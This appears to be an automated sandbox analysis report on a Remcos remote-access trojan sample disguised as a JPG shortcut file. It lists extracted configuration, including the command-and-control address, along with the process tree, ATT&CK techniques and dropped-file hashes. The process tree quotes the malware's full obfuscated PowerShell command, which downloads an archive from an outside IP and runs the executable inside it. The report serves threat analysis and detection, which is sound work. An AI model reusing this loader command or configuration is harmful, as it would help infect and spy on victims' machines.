remcos | 0973bf4ab963c2de6c69c3809ed228f0caf00409f4c09e78029640f2026dc19e

Resubmissions

29-08-2024 11:25

240829-nh9xrs1bll 10

29-08-2024 10:50

29-08-2024 10:06

29-08-2024 09:04

29-08-2024 08:36

Analysis

max time kernel
433s
max time network
435s
platform
windows10-2004_x64
resource
win10v2004-20240802-uk
resource tags

arch:x64arch:x86image:win10v2004-20240802-uklocale:uk-uaos:windows10-2004-x64systemwindows
submitted
29-08-2024 08:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

telegrama_ksv_po_btgr.jpg.lnk
Size

691KB
MD5

27fea6f5fbaffbbf1479cd9dfa9604fa
SHA1

ffe89c8b62b0faf639b056972db1a1974c53efa0
SHA256

df7d2e54b67a7788dd7c326a6c2a1c5b935b94288622fb7bbeff3ba336205cd7
SHA512

e901089462cd9d54f6de3d98ddaf10d94a3b1dc8ad5fb48f7facf0e3b8afcd97aa0caf3616f6548dcc3bb7e1eb8d6bc476bb8387c7cb0f689d0bab023c5deba5
SSDEEP

48:8xmuavUQSsejrK5053YMEDo//pxCMGopDDo/39OKXJa7x:8xy86enc+3hX/pxC530KXJQ

Score

10^/10

remcos feetfuck discovery rat

Malware Config

Extracted

Family

remcos

Botnet

feetfuck

83.222.191.201:24251

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-XTJ1YO
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 1 IoCs

flow	pid	Process
6	3220	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 2 IoCs

pid	Process
2296	Newfts.exe
4936	Newfts.exe

Loads dropped DLL 8 IoCs

pid	Process
2296	Newfts.exe
2296	Newfts.exe
2296	Newfts.exe
2296	Newfts.exe
4936	Newfts.exe
4936	Newfts.exe
4936	Newfts.exe
4936	Newfts.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\explorer.exe	explorer.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4936 set thread context of 2864	4936	Newfts.exe	97

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Newfts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Newfts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings	explorer.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3220	powershell.exe
3220	powershell.exe
2296	Newfts.exe
4936	Newfts.exe
4936	Newfts.exe
4936	Newfts.exe
2864	cmd.exe
2864	cmd.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4936	Newfts.exe
2864	cmd.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3220	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 864 wrote to memory of 3220	864	cmd.exe	85
PID 864 wrote to memory of 3220	864	cmd.exe	85
PID 3220 wrote to memory of 2296	3220	powershell.exe	94
PID 3220 wrote to memory of 2296	3220	powershell.exe	94
PID 3220 wrote to memory of 2296	3220	powershell.exe	94
PID 2296 wrote to memory of 4936	2296	Newfts.exe	95
PID 2296 wrote to memory of 4936	2296	Newfts.exe	95
PID 2296 wrote to memory of 4936	2296	Newfts.exe	95
PID 4936 wrote to memory of 2864	4936	Newfts.exe	97
PID 4936 wrote to memory of 2864	4936	Newfts.exe	97
PID 4936 wrote to memory of 2864	4936	Newfts.exe	97
PID 4936 wrote to memory of 2864	4936	Newfts.exe	97
PID 2864 wrote to memory of 4836	2864	cmd.exe	104
PID 2864 wrote to memory of 4836	2864	cmd.exe	104
PID 2864 wrote to memory of 4836	2864	cmd.exe	104
PID 2864 wrote to memory of 4836	2864	cmd.exe	104
PID 2864 wrote to memory of 4836	2864	cmd.exe	104
PID 4836 wrote to memory of 3392	4836	explorer.exe	115
PID 4836 wrote to memory of 3392	4836	explorer.exe	115
PID 4836 wrote to memory of 3392	4836	explorer.exe	115

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\telegrama_ksv_po_btgr.jpg.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo LCgtGMtcQQJaJlfGEbTWGQtHPnXvshSydqPjdadyHUqlchGjSeaWM; echo oIhdvwvvpCFrPXEuFwytiupeuuztBsyBbTIlLfifAJQuXhxp; echo HOoXHdZuZstQdflDScvNdstDTjusTXRkquolxTidEJXSlFbSdEjjTwx; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo jrJBbRkXWBdTmxLNkFmKcFkZNZRRTGZzEWLuBEZHNAvBPkncUoAZKvCdHl; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo JuhGhuKkmGFuLZMyQwPXHdhWkLqUpKudPsEClUijthIIp; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/telegrama_ksv_po_btgr.jpg -OutFile telegrama_ksv_po_btgr.jpg; echo CndnhqGwRKEgfnUJozdJravfXsLW; s''t''a''rt telegrama_ksv_po_btgr.jpg
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3220
- - C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe
    "C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2296
  - - C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe
      C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of WriteProcessMemory
      PID:4936
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:2864
      - C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        6⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:4836
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\toditpszikupbynhkndkybgt.vbs"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4ac3527e

Filesize
1.2MB

MD5
f0ca158d7c6d693adc81bad0c7f7651e

SHA1
503209218d631aeb371949894e84af744708982b

SHA256
b24055febd06aa1a8d14f1ad1e372bcc6e417cad80dc7e102ddb68d7ee967373

SHA512
2334b7f819e0b56d7886616c500f856f32c70a61c894327cd573d4171631b40b1fc6ed9528115a7d7263224f87cdb368227a24ff1790702076eb7159ebd0e761

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4p3sc11c.plp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\toditpszikupbynhkndkybgt.vbs

Filesize
324B

MD5
5969db124f530f24b0e1b305ca5a8291

SHA1
5eb79a70cc356a20ba39913489a5cdca36f83011

SHA256
3a4ae3a89b9c1d79fbef06dd969b1307837c0378966c5f7ceddafb1e4660a072

SHA512
0297ea245560c1b5fe64f5a3cd7769ea4e9f09dfc4cc4f16c8d96c5b5d846c8982458991aa143ea5a103436a03c5e7d5b7769b2b87bca5565e856de960e2e290

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe

Filesize
2.1MB

MD5
db7e67835fce6cf9889f0f68ca9c29a9

SHA1
5565afda37006a66f0e4546105be60bbe7970616

SHA256
dbd3057a58fd3407c95418bc5d9c253adc8c658ee338f22d58374ed3ea37b738

SHA512
bc2714bb408715e5e1cec1337b831e26dbda208183955a07ec8653a38c9c0f25f60f333a154b738927ce085e7bbff438963b941a6c2773b3e7325cd900e7651b

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\ProductStatistics3.dll

Filesize
1.1MB

MD5
59c15c71fd599ff745a862d0b8932919

SHA1
8384f88b4cac4694cf510ca0d3f867fd83cc9e18

SHA256
c4ed07ad748661ce776ac6ebb4f8bef7619586bfb4443ce58c92d4b889f3d5c2

SHA512
be3425d55dcaa361bc8481b87b2086454baca79a3c948de9acf9ef7d3084d6d987c328d665b45dfcd0510e2c97c980aa63d7cd669fe9fc1a67983c325593481e

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\RegisterIdr.dll

Filesize
1.4MB

MD5
6fdb2e9ca6b7a5ad510e2b29831e3bc8

SHA1
4a14ee9d5660eb271a6b5f18a55ac3e05f952c68

SHA256
f510c85b98fa6fe8d30133114a34b7f77884aa58e57a0561722eeb157dc98a38

SHA512
d5248dd902d862afa060ab829fc3a39dccc26dab37737e14a3f9b90b1d3f900b3bf5821f450502a2124016acf0e84bd8979758827a92741f879b2fa4addfda06

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\kytarvx

Filesize
31KB

MD5
5dc69a3e2fda6cb740f363ef77edcc13

SHA1
c177fabf17346531e07d562be11915bf2822148a

SHA256
7c24abda04537749bfb1b2d2aa57a7c9261f41012435269347f7eb2d05f71621

SHA512
b32848b6eded965245b759be1b72b6fc81acb4002eceae96004e88e549e21eb6eb1ceb3e51f6249d7dfb739f31223e623f7c525f677939bc935d2f6bffb50a9f

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\nywrof

Filesize
1.0MB

MD5
471076308d78944d45ab35d37134134a

SHA1
05cf2cf6e5d11ce10425b14d68cda3246cc47263

SHA256
38d10ba2f4411eba8351d5b3fed74ca46bf856569dca757d055eb49d8471e11b

SHA512
7f140546ceda85d3c178a61689a0743c75623b7d1e2dcc3e2d29128d7e13d9671cdb660ca46312dbd8ff3d63c12836caf1a6a54c074d66bed269184044bdd9c3

Download Submit
memory/2296-64-0x0000000002CE0000-0x0000000002DFE000-memory.dmp

Filesize
1.1MB

Download
memory/2296-53-0x0000000074870000-0x00000000749EB000-memory.dmp

Filesize
1.5MB

Download
memory/2296-45-0x0000000002CE0000-0x0000000002DFE000-memory.dmp

Filesize
1.1MB

Download
memory/2296-63-0x0000000000400000-0x0000000000669000-memory.dmp

Filesize
2.4MB

Download
memory/2296-65-0x0000000003040000-0x00000000031B2000-memory.dmp

Filesize
1.4MB

Download
memory/2296-49-0x0000000003040000-0x00000000031B2000-memory.dmp

Filesize
1.4MB

Download
memory/2296-54-0x00007FF889D70000-0x00007FF889F65000-memory.dmp

Filesize
2.0MB

Download
memory/2864-91-0x00007FF889D70000-0x00007FF889F65000-memory.dmp

Filesize
2.0MB

Download
memory/2864-93-0x0000000074870000-0x00000000749EB000-memory.dmp

Filesize
1.5MB

Download
memory/3220-52-0x00007FF877AB0000-0x00007FF878571000-memory.dmp

Filesize
10.8MB

Download
memory/3220-20-0x000002169BB80000-0x000002169BB8A000-memory.dmp

Filesize
40KB

Download
memory/3220-14-0x00007FF877AB0000-0x00007FF878571000-memory.dmp

Filesize
10.8MB

Download
memory/3220-15-0x00007FF877AB3000-0x00007FF877AB5000-memory.dmp

Filesize
8KB

Download
memory/3220-13-0x00007FF877AB0000-0x00007FF878571000-memory.dmp

Filesize
10.8MB

Download
memory/3220-16-0x00007FF877AB0000-0x00007FF878571000-memory.dmp

Filesize
10.8MB

Download
memory/3220-8-0x00000216B3EB0000-0x00000216B3ED2000-memory.dmp

Filesize
136KB

Download
memory/3220-2-0x00007FF877AB3000-0x00007FF877AB5000-memory.dmp

Filesize
8KB

Download
memory/3220-18-0x00007FF877AB0000-0x00007FF878571000-memory.dmp

Filesize
10.8MB

Download
memory/3220-19-0x00000216B42A0000-0x00000216B42B2000-memory.dmp

Filesize
72KB

Download
memory/3220-81-0x00007FF877AB0000-0x00007FF878571000-memory.dmp

Filesize
10.8MB

Download
memory/4836-104-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-105-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-133-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-129-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-128-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-127-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-126-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-95-0x00007FF889D70000-0x00007FF889F65000-memory.dmp

Filesize
2.0MB

Download
memory/4836-96-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-99-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-100-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-101-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-102-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-103-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-122-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-121-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-114-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-115-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-116-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-117-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-118-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-119-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4836-120-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/4936-84-0x0000000002E10000-0x0000000002F82000-memory.dmp

Filesize
1.4MB

Download
memory/4936-73-0x0000000002E10000-0x0000000002F82000-memory.dmp

Filesize
1.4MB

Download
memory/4936-76-0x0000000074870000-0x00000000749EB000-memory.dmp

Filesize
1.5MB

Download
memory/4936-77-0x00007FF889D70000-0x00007FF889F65000-memory.dmp

Filesize
2.0MB

Download
memory/4936-83-0x0000000002A70000-0x0000000002B8E000-memory.dmp

Filesize
1.1MB

Download
memory/4936-85-0x0000000074870000-0x00000000749EB000-memory.dmp

Filesize
1.5MB

Download
memory/4936-82-0x0000000000400000-0x0000000000669000-memory.dmp

Filesize
2.4MB

Download
memory/4936-69-0x0000000002A70000-0x0000000002B8E000-memory.dmp

Filesize
1.1MB

Download